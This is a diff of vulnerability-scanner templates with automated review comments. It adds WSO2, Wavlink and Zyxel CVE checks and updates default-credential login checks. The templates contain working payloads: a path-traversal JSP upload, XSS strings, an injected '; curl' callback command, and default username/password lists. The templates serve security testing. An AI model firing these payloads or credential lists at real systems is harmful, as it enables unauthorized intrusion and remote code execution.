Content-Length: 348 + + -----------------------------250033711231076532771336998311 + Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/{{to_lower("{{randstr}}")}}.jsp";filename="test.jsp" + Content-Type: application/octet-stream + + <% out.print("WSO2-RCE-CVE-2022-29464"); %> + -----------------------------250033711231076532771336998311-- + + - | + GET /authenticationendpoint/{{to_lower("{{randstr}}")}}.jsp HTTP/1.1 + Host: {{Hostname}} + + req-condition: true + matchers: + - type: dsl + dsl: + - "contains(body_2, 'WSO2-RCE-CVE-2022-29464')" + +# Enhanced by mp on 2022/05/19 
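Review bot: The hard-coded `Content-Length: 348` in the CVE-2022-29464 upload does not track the body, whose `Content-Disposition` filename embeds a `{{to_lower("{{randstr}}")}}` value; nuclei appears to recompute the length for raw requests that are not marked `unsafe: true`, but if someone later switches the template to `unsafe` mode the stale value will truncate or stall the multipart upload. Drop the `Content-Length` line and let the client compute it. The written JSP is never removed and the description should say so alongside the existing `intrusive` tag, e.g. append `A successful match leaves {{randstr}}.jsp under authenticationendpoint/; remove it after testing.` to `description`.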
diff --git a/cves/2022/CVE-2022-29548.yaml b/cves/2022/CVE-2022-29548.yaml new file mode 100644 index 0000000000..15153c4e76 --- /dev/null +++ b/cves/2022/CVE-2022-29548.yaml @@ -0,0 +1,42 @@ +id: CVE-2022-29548 + +info: + name: WSO2 Management Console - Reflected XSS + author: edoardottt + severity: medium + description: | + A reflected XSS issue exists in the Management Console of several WSO2 products. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-29548 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29548 + - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1603 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-29548 + cwe-id: CWE-79 + metadata: + google-dork: inurl:"carbon/admin/login" + verified: true + tags: cve,cve2022,wso2,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)//" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "CARBON.showWarningDialog('???');alert(document.domain)//???" + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 diff --git a/cves/2022/CVE-2022-30489.yaml b/cves/2022/CVE-2022-30489.yaml new file mode 100644 index 0000000000..94facbccf6 --- /dev/null +++ b/cves/2022/CVE-2022-30489.yaml 
@@ -0,0 +1,44 @@ +id: CVE-2022-30489 + +info: + name: Wavlink Wn535g3 - POST XSS + author: For3stCo1d + severity: medium + description: | + WAVLINK WN535 G3 was discovered to contain a cross-site scripting (XSS) vulnerability via the hostname parameter at /cgi-bin/login.cgi. + reference: + - https://github.com/badboycxcc/XSS-CVE-2022-30489 + - https://nvd.nist.gov/vuln/detail/CVE-2022-30489 + - https://github.com/badboycxcc/XSS + metadata: + shodan-query: http.title:"Wi-Fi APP Login" + verified: "true" + classification: + cve-id: CVE-2022-30489 + tags: xss,cve2022,wavlink,cve,router,iot + +requests: + - raw: + - | + POST /cgi-bin/login.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + newUI=1&page=login&username=admin&langChange=0&ipaddr=x.x.x.x&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=")</script><script>alert(document.domain);</script>&key=M27234733&password=63a36bceec2d3bba30d8611c323f4cda&lang_=cn + + matchers-condition: and + matchers: + - type: word + words: + - '<script>alert(document.domain);</script>' + - 'parent.location.replace("http://")' + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/cves/2022/CVE-2022-30525.yaml b/cves/2022/CVE-2022-30525.yaml new file mode 100644 index 0000000000..2f46378e32 --- /dev/null +++ b/cves/2022/CVE-2022-30525.yaml 
@@ -0,0 +1,40 @@
+id: CVE-2022-30525
+
+info:
+ name: Zyxel Firewall - OS Command Injection
+ author: h1ei1,prajiteshsingh
+ severity: critical
+ description: |
+ An OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, are susceptible to a command injection vulnerability which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device.
+ reference:
+ - https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/
+ - https://github.com/rapid7/metasploit-framework/pull/16563
+ - https://www.zyxel.com/support/Zyxel-security-advisory-for-OS-command-injection-vulnerability-of-firewalls.shtml
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-30525
+ classification:
+ cve-id: CVE-2022-30525
+ metadata:
+ shodan-query: title:"USG FLEX 100","USG FLEX 100w","USG FLEX 200","USG FLEX 500","USG FLEX 700","USG FLEX 50","USG FLEX 50w","ATP100","ATP200","ATP500","ATP700"
+ tags: rce,zyxel,cve,cve2022,firewall,unauth
+
+requests:
+ - raw:
+ - |
+ POST /ztp/cgi-bin/handler HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/json
+
+ {"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; curl {{interactsh-url}};","data":"hi"}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "http"
+
+ - type: status
+ status:
+ - 500
+
+# Enhanced by mp on 2022/05/19
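Review bot: With `matchers-condition: and`, a finding requires both the interactsh HTTP callback and a `500` status; the out-of-band callback is the decisive evidence here, so a device that executes the command but answers with a different status is reported as not vulnerable. If the 500 has been observed to be reliable, say so where the matcher is, `# handler returns 500 once the injected command runs — observed on <firmware version>` (placeholder), so a later maintainer does not remove it as noise; otherwise drop the status matcher and let the interactsh match stand alone. The `classification` block also lacks `cwe-id: CWE-78` and the CVSS vector, which the other CVE templates in this diff carry.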
diff --git a/default-logins/UCMDB/ucmdb-default-login.yaml b/default-logins/UCMDB/ucmdb-default-login.yaml
index d7dc80bd03..7f92b3251a 100644
--- a/default-logins/UCMDB/ucmdb-default-login.yaml
+++ b/default-logins/UCMDB/ucmdb-default-login.yaml
@@ -1,9 +1,15 @@
 id: ucmdb-default-login
 
 info:
- name: Micro Focus UCMDB Default Login
+ name: Micro Focus Universal CMDB Default Login
 author: dwisiswant0
 severity: high
+ description: Micro Focus Universal CMDB default login credentials were discovered for diagnostics/admin. Note there is potential for this to be chained together with other vulnerabilities as with CVE-2020-11853
+ and CVE-2020-11854.
+ reference:
+ - https://packetstormsecurity.com/files/161182/Micro-Focus-UCMDB-Remote-Code-Execution.htm
+ classification:
+ cwe-id: CWE-798
 tags: ucmdb,default-login
 
 requests:
@@ -31,3 +37,5 @@ requests:
 part: header
 words:
 - "LWSSO_COOKIE_KEY"
+
+# Enhanced by mp on 2022/03/07
diff --git a/default-logins/abb/cs141-default-login.yaml b/default-logins/abb/cs141-default-login.yaml
index 92c18a864b..9143fa25bb 100644
--- a/default-logins/abb/cs141-default-login.yaml
+++ b/default-logins/abb/cs141-default-login.yaml
@@ -1,13 +1,17 @@
 id: cs141-default-login
 
 info:
- name: CS141 SNMP Module Default Login
+ name: UPS Adapter CS141 SNMP Module Default Login
 author: socketz
 severity: medium
- reference: https://www.generex.de/media/pages/packages/documents/manuals/f65348d5b6-1628841637/manual_CS141_en.pdf
- tags: hiawatha,iot,default-login
+ description: UPS Adapter CS141 SNMP Module default login credentials were discovered.
+ reference:
+ - https://www.generex.de/media/pages/packages/documents/manuals/f65348d5b6-1628841637/manual_CS141_en.pdf
+ classification:
+ cwe-id: CWE-798
 metadata:
 shodan-query: https://www.shodan.io/search?query=html%3A%22CS141%22
+ tags: hiawatha,iot,default-login
 
 requests:
 - raw:
@@ -48,3 +52,5 @@ requests:
 - type: kval
 kval:
 - accessToken
+
+# Enhanced by mp on 2022/03/07
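Review bot: The new `description:` in the UCMDB hunk is a plain scalar that runs onto a second line (`and CVE-2020-11854.`); YAML folds that continuation into the value only because it is indented deeper than the key, so any re-indent or a trailing `:` in the text turns it into a parse error or a stray key. Write it as a folded block, `description: >-`, with the sentences indented beneath it. The `remediation:` field added to `default-logins/dell/emcecom-default-login.yaml` later in this diff has the same two-line plain scalar and wants the same fix.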
diff --git a/default-logins/activemq/activemq-default-login.yaml b/default-logins/activemq/activemq-default-login.yaml index a4dea884a5..843f3e8cab 100644 --- a/default-logins/activemq/activemq-default-login.yaml +++ b/default-logins/activemq/activemq-default-login.yaml @@ -4,6 +4,9 @@ info: name: Apache ActiveMQ Default Login author: pdteam severity: medium + description: Apache ActiveMQ default login information was discovered. + reference: + - https://knowledge.broadcom.com/external/article/142813/vulnerability-apache-activemq-admin-con.html tags: apache,activemq,default-login requests: @@ -26,4 +29,6 @@ requests: words: - 'Welcome to the Apache ActiveMQ Console of <b>' - '<h2>Broker</h2>' - condition: and \ No newline at end of file + condition: and + +# Enhanced by mp on 2022/03/07 diff --git a/default-logins/aem/aem-default-login.yaml b/default-logins/aem/aem-default-login.yaml index 4a3fe43989..66a6189c19 100644 --- a/default-logins/aem/aem-default-login.yaml +++ b/default-logins/aem/aem-default-login.yaml @@ -3,8 +3,17 @@ id: aem-default-login info: name: Adobe AEM Default Login author: random-robbie - severity: critical - tags: aem,default-login + severity: high + description: Adobe AEM default login credentials were discovered. + reference: + - https://experienceleague.adobe.com/docs/experience-manager-64/administering/security/security-checklist.html?lang=en + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + shodan-query: http.component:"Adobe Experience Manager" + tags: aem,default-login,adobe requests: - raw: @@ -24,12 +33,20 @@ requests: - grios - replication-receiver - vgnadmin + - author + - anonymous + - jdoe@geometrixx.info + - aparker@geometrixx.info aem_pass: - admin - password - replication-receiver - vgnadmin + - author + - anonymous + - jdoe + - aparker stop-at-first-match: true matchers-condition: and 
@@ -40,7 +57,9 @@ requests:
 
 - type: word
 part: header
- condition: and
 words:
 - login-token
 - crx.default
+ condition: and
+
+# Enhanced by mp on 2022/03/23
diff --git a/default-logins/alibaba/canal-default-login.yaml b/default-logins/alibaba/canal-default-login.yaml
index a4c4a1b801..d9b73d5898 100644
--- a/default-logins/alibaba/canal-default-login.yaml
+++ b/default-logins/alibaba/canal-default-login.yaml
@@ -4,6 +4,13 @@ info:
 name: Alibaba Canal Default Login
 author: pdteam
 severity: high
+ description: An Alibaba Canal default login was discovered.
+ reference:
+ - https://github.com/alibaba/canal/wiki/ClientAdapter
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+ cvss-score: 8.3
+ cwe-id: CWE-522
 tags: alibaba,default-login
 
 requests:
@@ -33,3 +40,5 @@ requests:
 words:
 - 'data":{"token"'
 - '"code":20000'
+
+# Enhanced by mp on 2022/03/22
diff --git a/default-logins/alphaweb/alphaweb-default-login.yaml b/default-logins/alphaweb/alphaweb-default-login.yaml
index 6532087439..6a48f18c6e 100644
--- a/default-logins/alphaweb/alphaweb-default-login.yaml
+++ b/default-logins/alphaweb/alphaweb-default-login.yaml
@@ -4,8 +4,14 @@ info:
 name: AlphaWeb XE Default Login
 author: Lark Lab
 severity: medium
- tags: default-login
- reference: https://wiki.zenitel.com/wiki/AlphaWeb
+ description: An AlphaWeb XE default login was discovered.
+ reference:
+ - https://wiki.zenitel.com/wiki/AlphaWeb
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
+ cvss-score: 5.8
+ cwe-id: CWE-522
+ tags: default-login,AlphaWeb
 
 requests:
 - raw:
@@ -32,4 +38,6 @@ requests:
 
 - type: status
 status:
- - 200
\ No newline at end of file
+ - 200
+
+# Enhanced by mp on 2022/03/22
diff --git a/default-logins/ambari/ambari-default-login.yaml b/default-logins/ambari/ambari-default-login.yaml
index 6bb9c6de1a..b23093118b 100644
--- a/default-logins/ambari/ambari-default-login.yaml
+++ b/default-logins/ambari/ambari-default-login.yaml
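Review bot: `tags: default-login,AlphaWeb` in the AlphaWeb hunk introduces a mixed-case tag, while every other tag written in this diff is lowercase (`aem,default-login,adobe`, `alibaba,default-login`, `ambari,default-login,apache`). If tag selection on the command line is compared case-sensitively, a run filtered on `alphaweb` would skip this template; either way the corpus convention is lowercase. Change it to `tags: default-login,alphaweb`.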
@@ -3,8 +3,15 @@ id: ambari-default-login
 info:
 name: Apache Ambari Default Login
 author: pdteam
- severity: medium
- tags: ambari,default-login
+ severity: high
+ description: An Apache Ambari default admin login was discovered.
+ reference:
+ - https://ambari.apache.org/1.2.0/installing-hadoop-using-ambari/content/ambari-chap3-1.html
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+ cvss-score: 8.3
+ cwe-id: CWE-522
+ tags: ambari,default-login,apache
 
 requests:
 - raw:
@@ -23,4 +30,6 @@ requests:
 words:
 - '"Users" : {'
 - 'AMBARI.'
- condition: and
\ No newline at end of file
+ condition: and
+
+# Enhanced by mp on 2022/03/22
diff --git a/default-logins/apache/airflow-default-login.yaml b/default-logins/apache/airflow-default-login.yaml
index 6b84d33a88..772e1ffd78 100644
--- a/default-logins/apache/airflow-default-login.yaml
+++ b/default-logins/apache/airflow-default-login.yaml
@@ -3,11 +3,17 @@ id: airflow-default-login
 info:
 name: Apache Airflow Default Login
 author: pdteam
- severity: critical
- tags: airflow,default-login
- reference: https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html
+ severity: high
+ description: An Apache Airflow default login was discovered.
+ reference:
+ - https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+ cvss-score: 8.3
+ cwe-id: CWE-522
 metadata:
 shodan-query: title:"Sign In - Airflow"
+ tags: airflow,default-login,apache
 
 requests:
 - raw:
@@ -53,4 +59,6 @@ requests:
 
 - type: word
 words:
- - 'You should be redirected automatically to target URL: <a href="/">'
\ No newline at end of file
+ - 'You should be redirected automatically to target URL: <a href="/">'
+
+# Enhanced by mp on 2022/03/22
diff --git a/default-logins/apache/apisix-default-login.yaml b/default-logins/apache/apisix-default-login.yaml
new file mode 100644
index 0000000000..d89104b847
--- /dev/null
+++ b/default-logins/apache/apisix-default-login.yaml
@@ -0,0 +1,51 @@
+id: apisix-default-login
+
+info:
+ name: Apache Apisix Default Admin Login
+ author: pdteam
+ severity: high
+ description: An Apache Apisix default admin login was discovered.
+ reference:
+ - https://apisix.apache.org/
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+ cvss-score: 8.3
+ cwe-id: CWE-522
+ metadata:
+ shodan-query: title:"Apache APISIX Dashboard"
+ fofa-query: title="Apache APISIX Dashboard"
+ product: https://apisix.apache.org
+ tags: apisix,apache,default-login
+
+requests:
+ - raw:
+ - |
+ POST /apisix/admin/user/login HTTP/1.1
+ Host: {{Hostname}}
+ Accept: application/json
+ Authorization:
+ Content-Type: application/json;charset=UTF-8
+
+ {"username":"{{user}}","password":"{{pass}}"}
+
+ attack: pitchfork
+ payloads:
+ user:
+ - admin
+ pass:
+ - admin
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - '"data"'
+ - '"token"'
+ - '"code":0'
+ condition: and
+
+# Enhanced by mp on 2022/03/22
diff --git a/default-logins/apache/dolphinscheduler-default-login.yaml b/default-logins/apache/dolphinscheduler-default-login.yaml
new file mode 100644
index 0000000000..e52b6c717a
--- /dev/null
+++ b/default-logins/apache/dolphinscheduler-default-login.yaml
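Review bot: The raw request carries an `Authorization:` header with an empty value; the credentials travel in the JSON body, so the header appears to do nothing, and strict front-ends can reject or strip a header with no value, which would turn a real finding into a miss. Drop the line unless the dashboard is known to require the header to be present, in which case keep it and record why in a comment above the `raw:` block, e.g. `# dashboard rejects the login POST when the Authorization header is absent — verified on <version>` (placeholder). The `product: https://apisix.apache.org` metadata key is not used by the other new templates in this diff, which only write `shodan-query`/`fofa-query`; confirm it is a recognised key or move the URL into `reference`.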
@@ -0,0 +1,47 @@
+id: dolphinscheduler-default-login
+
+info:
+ name: Apache DolphinScheduler Default Login
+ author: For3stCo1d
+ severity: high
+ description: Apache DolphinScheduler default admin credentials were discovered.
+ reference:
+ - https://github.com/apache/dolphinscheduler
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+ cvss-score: 8.3
+ cwe-id: CWE-522
+ metadata:
+ shodan-query: http.title:"DolphinScheduler"
+ tags: apache,dolphinscheduler,default-login,oss
+
+requests:
+ - raw:
+ - |
+ POST /dolphinscheduler/login HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ userName={{user}}&userPassword={{pass}}
+
+ attack: pitchfork
+ payloads:
+ user:
+ - admin
+ pass:
+ - dolphinscheduler123
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '"msg":"login success"'
+ - '"sessionId":'
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/03/28
diff --git a/default-logins/apache/dubbo-admin-default-login.yaml b/default-logins/apache/dubbo-admin-default-login.yaml
new file mode 100644
index 0000000000..0ed4d68121
--- /dev/null
+++ b/default-logins/apache/dubbo-admin-default-login.yaml
@@ -0,0 +1,39 @@
+id: dubbo-admin-default-login
+
+info:
+ name: Dubbo Admin Default Login
+ author: ritikchaddha
+ severity: high
+ reference:
+ - https://www.cnblogs.com/wishwzp/p/9438658.html
+ tags: dubbo,apache,default-login
+
+requests:
+ - raw:
+ - |
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+ Authorization: Basic {{base64(username + ':' + password)}}
+
+ attack: pitchfork
+ payloads:
+ username:
+ - guest
+ - root
+ password:
+ - guest
+ - root
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "<title>Dubbo Admin"
+ - "/sysinfo/versions"
+ - "{{username}}', '/logout')"
+ condition: and
+
+ - type: status
+ status:
+ - 200
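Review bot: The Dubbo Admin template ships without a `description:` or a `classification:` block, while the DolphinScheduler template in the same hunk line and the other new default-login templates in this commit all carry `cwe-id: CWE-522` with the CVSS 8.3 vector; the Ranger template added further down (`default-logins/apache/ranger-default-login.yaml`) has the same gap and also writes `reference:` as a bare scalar instead of the list form used everywhere else. Add `description: Dubbo Admin default login credentials were discovered.` and a `classification:` block mirroring DolphinScheduler's. The `Content-Type: application/x-www-form-urlencoded` header on a bodiless GET is also dead weight and can be removed.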
diff --git a/default-logins/apache/kafka-center-default-login.yaml b/default-logins/apache/kafka-center-default-login.yaml
new file mode 100644
index 0000000000..0863274a69
--- /dev/null
+++ b/default-logins/apache/kafka-center-default-login.yaml
@@ -0,0 +1,47 @@
+id: kafka-center-default-login
+
+info:
+ name: Apache Kafka Center Default Login
+ author: dhiyaneshDK
+ severity: high
+ description: Apache Kafka Center default admin credentials were discovered.
+ reference:
+ - https://developer.ibm.com/tutorials/kafka-authn-authz/
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+ cvss-score: 8.3
+ cwe-id: CWE-522
+ metadata:
+ shodan-query: http.title:"Kafka Center"
+ tags: kafka,default-login
+
+requests:
+ - raw:
+ - |
+ POST /login/system HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/json
+
+ {"name":"{{username}}","password":"{{password}}","checkbox":false}
+
+ attack: pitchfork
+ payloads:
+ username:
+ - admin
+ password:
+ - admin
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ words:
+ - '"code":200'
+ - '"name":"admin"'
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/03/10
diff --git a/default-logins/apache/ranger-default-login.yaml b/default-logins/apache/ranger-default-login.yaml
new file mode 100644
index 0000000000..5edd99329e
--- /dev/null
+++ b/default-logins/apache/ranger-default-login.yaml
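Review bot: The body matcher hard-codes `'"name":"admin"'` although the username is parameterised through the `username` payload list, so any further pair appended to the payloads can log in successfully and still be reported as a miss. Use the payload variable in the matcher as the Dubbo template in this same diff does, `- '"name":"{{username}}"'`, so the check tracks whatever credential actually succeeded. The blank line between `matchers:` and its first `- type:` entry is also out of step with the other templates here and can go.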
@@ -0,0 +1,39 @@ +id: ranger-default-login + +info: + name: Apache Ranger Default Login + author: For3stCo1d + severity: high + reference: https://github.com/apache/ranger + metadata: + shodan-query: http.title:"Ranger - Sign In" + tags: apache,ranger,default-login + +requests: + - raw: + - | + POST /login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + username={{user}}&password={{pass}} + + attack: pitchfork + payloads: + user: + - admin + pass: + - admin + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"statusCode":200' + - '"msgDesc":"Login Successful"' + condition: and + + - type: status + status: + - 200 diff --git a/default-logins/apache/tomcat-default-login.yaml b/default-logins/apache/tomcat-default-login.yaml index 9b4556e810..5beb8f24ea 100644 --- a/default-logins/apache/tomcat-default-login.yaml +++ b/default-logins/apache/tomcat-default-login.yaml @@ -1,8 +1,12 @@ id: tomcat-default-login + info: - name: Tomcat Manager Default Login + name: ApahceTomcat Manager Default Login author: pdteam severity: high + description: Apache Tomcat Manager default login credentials were discovered. This template checks for multiple variations. + reference: + - https://www.rapid7.com/db/vulnerabilities/apache-tomcat-default-ovwebusr-password/ tags: tomcat,apache,default-login requests: @@ -57,10 +61,16 @@ requests: matchers-condition: and matchers: + - type: word + part: body + words: + - "Apache Tomcat" + - "Server Information" + - "Hostname" + condition: and + - type: status status: - 200 - - type: word - words: - - Apache Tomcat \ No newline at end of file +# Enhanced by mp on 2022/03/03 diff --git a/default-logins/apollo/apollo-default-login.yaml b/default-logins/apollo/apollo-default-login.yaml new file mode 100644 index 0000000000..c9e119d097 --- /dev/null +++ b/default-logins/apollo/apollo-default-login.yaml 
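Review bot: The Tomcat hunk renames the template to `name: ApahceTomcat Manager Default Login`, which misspells the vendor and drops the space; this string is what appears in scan output and in the generated README, so it should be `name: Apache Tomcat Manager Default Login`. The second Tomcat hunk replaces the old lone `Apache Tomcat` word match with a three-word `condition: and` match, which is stricter and fine, but the `Hostname` word would be worth a one-line comment saying which manager page it is expected on, since a bare `Hostname` is a generic token.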
@@ -0,0 +1,57 @@
+id: apollo-default-login
+
+info:
+ name: Apollo Default Login
+ author: PaperPen
+ severity: high
+ description: An Apollo default login was discovered.
+ reference:
+ - https://github.com/apolloconfig/apollo
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+ cvss-score: 8.3
+ cwe-id: CWE-522
+ metadata:
+ shodan-query: http.favicon.hash:11794165
+ tags: apollo,default-login
+
+requests:
+ - raw:
+ - |
+ POST /signin HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+ Origin: {{BaseURL}}
+ Referer: {{BaseURL}}/signin?
+
+ username={{user}}&password={{pass}}&login-submit=Login
+
+ - |
+ GET /user HTTP/1.1
+ Host: {{Hostname}}
+
+ attack: pitchfork
+ payloads:
+ user:
+ - apollo
+ pass:
+ - admin
+
+ cookie-reuse: true
+ req-condition: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body_2
+ words:
+ - '"userId":'
+ - '"email":'
+ condition: or
+
+ - type: dsl
+ dsl:
+ - "status_code_1 == 302 && status_code_2 == 200"
+ - "contains(tolower(all_headers_2), 'application/json')"
+ condition: and
+
+# Enhanced by mp on 2022/03/22
diff --git a/default-logins/arl/arl-default-login.yaml b/default-logins/arl/arl-default-login.yaml
index a7c16e40a9..f5dcf2d27b 100644
--- a/default-logins/arl/arl-default-login.yaml
+++ b/default-logins/arl/arl-default-login.yaml
@@ -1,9 +1,14 @@
 id: arl-default-login
 
 info:
- name: ARL Default Login
+ name: ARL Default Admin Login
 author: pikpikcu
 severity: high
+ description: An ARL default admin login was discovered.
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+ cvss-score: 8.3
+ cwe-id: CWE-522
 tags: arl,default-login
 
 requests:
@@ -35,3 +40,5 @@ requests:
 - type: status
 status:
 - 200
+
+# Enhanced by mp on 2022/03/22
diff --git a/default-logins/axis2/axis2-default-login.yaml b/default-logins/axis2/axis2-default-login.yaml
deleted file mode 100644
index db69d4767f..0000000000
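Review bot: The ARL hunk adds a `description:` and a full `classification:` block but no `reference:`, which every other template enriched in this commit now carries; without it a reader cannot tell where the default admin credential claim comes from. Add `reference:` with a list entry pointing at the project's documentation for the default account (`- <ARL project docs URL>` as a placeholder until confirmed). The ARL hunk is complete here; the file's request block is outside the visible context.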
--- a/default-logins/axis2/axis2-default-login.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: axis2-default-login - -info: - name: Axis2 Default Login - author: pikpikcu - severity: high - tags: axis,apache,default-login - -requests: - - raw: - - | - POST /axis2-admin/login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - loginUsername={{username}}&loginPassword={{password}} - - - | - POST /axis2/axis2-admin/login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - userName={{username}}&password={{password}}&submit=+Login+ - - payloads: - username: - - admin - password: - - axis2 - attack: pitchfork - - matchers-condition: and - matchers: - - - type: word - words: - - "

Welcome to Axis2 Web Admin Module !!

" - - - type: status - status: - - 200 diff --git a/default-logins/azkaban/azkaban-default-login.yaml b/default-logins/azkaban/azkaban-default-login.yaml index 5d9e13ca58..c524be5d45 100644 --- a/default-logins/azkaban/azkaban-default-login.yaml +++ b/default-logins/azkaban/azkaban-default-login.yaml 
@@ -1,47 +1,53 @@
-id: azkaban-default-login
-
-info:
- name: Azkaban Web Client Default Credential
- author: pussycat0x
- severity: high
- reference: https://www.shodan.io/search?query=http.title%3A%22Azkaban+Web+Client%22
- tags: default-login,azkaban
-
-requests:
- - raw:
- - |
- POST / HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-
- action=login&username={{username}}&password={{password}}
-
- payloads:
- username:
- - admin
- password:
- - admin
- attack: pitchfork
- matchers-condition: and
- matchers:
- - type: word
- words:
- - '"session.id"'
- - '"success"'
- condition: and
-
- - type: word
- words:
- - 'azkaban.browser.session.id'
- - 'application/json'
- condition: and
- part: header
-
- - type: status
- status:
- - 200
-
- extractors:
- - type: kval
- kval:
- - azkaban.browser.session.id
+id: azkaban-default-login
+
+info:
+ name: Azkaban Web Client Default Credential
+ author: pussycat0x
+ severity: high
+ description: Azkaban is a batch workflow job scheduler created at LinkedIn to run Hadoop jobs. Default web client credentials were discovered.
+ reference:
+ - https://www.shodan.io/search?query=http.title%3A%22Azkaban+Web+Client%22
+ classification:
+ cwe-id: CWE-798
+ tags: default-login,azkaban
+
+requests:
+ - raw:
+ - |
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+ action=login&username={{username}}&password={{password}}
+
+ payloads:
+ username:
+ - admin
+ password:
+ - admin
+ attack: pitchfork
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '"session.id"'
+ - '"success"'
+ condition: and
+
+ - type: word
+ words:
+ - 'azkaban.browser.session.id'
+ - 'application/json'
+ condition: and
+ part: header
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: kval
+ kval:
+ - azkaban.browser.session.id
+
+# Enhanced by mp on 2022/03/03
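Review bot: Every line of `azkaban-default-login.yaml` is shown as removed and re-added although the only content changes are the new `description:`, the `reference:` list form, the `classification:` block and the trailing comment; a whole-file rewrite with otherwise identical text is usually a line-ending or trailing-whitespace normalisation, which this hunk does not make visible. If that is what happened, commit the normalisation separately (or add `* text=auto` to `.gitattributes`) so that the four-line substantive change is reviewable and `git blame` on the request block is not reset to this commit. The `reference:` entry is a Shodan search URL rather than vendor documentation of the default credential; a product reference alongside it would serve the reader better.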
diff --git a/default-logins/chinaunicom/chinaunicom-default-login.yaml b/default-logins/chinaunicom/chinaunicom-default-login.yaml
index 9b69089ffb..f4df076f63 100644
--- a/default-logins/chinaunicom/chinaunicom-default-login.yaml
+++ b/default-logins/chinaunicom/chinaunicom-default-login.yaml
@@ -1,9 +1,12 @@
 id: chinaunicom-default-login
 
 info:
- name: Chinaunicom Modem Default Login
+ name: China Unicom Modem Default Login
 author: princechaddha
 severity: high
+ description: Default login credentials were discovered for a China Unicom modem.
+ classification:
+ cwe-id: CWE-798
 tags: chinaunicom,default-login
 
 requests:
@@ -31,3 +34,5 @@ requests:
 words:
 - "/menu.gch"
 part: header
+
+# Enhanced by mp on 2022/03/03
diff --git a/default-logins/cobbler/cobbler-default-login.yaml b/default-logins/cobbler/cobbler-default-login.yaml
new file mode 100644
index 0000000000..2cfe8ba153
--- /dev/null
+++ b/default-logins/cobbler/cobbler-default-login.yaml
@@ -0,0 +1,72 @@
+id: cobbler-default-login
+
+info:
+ name: Cobbler Default Login
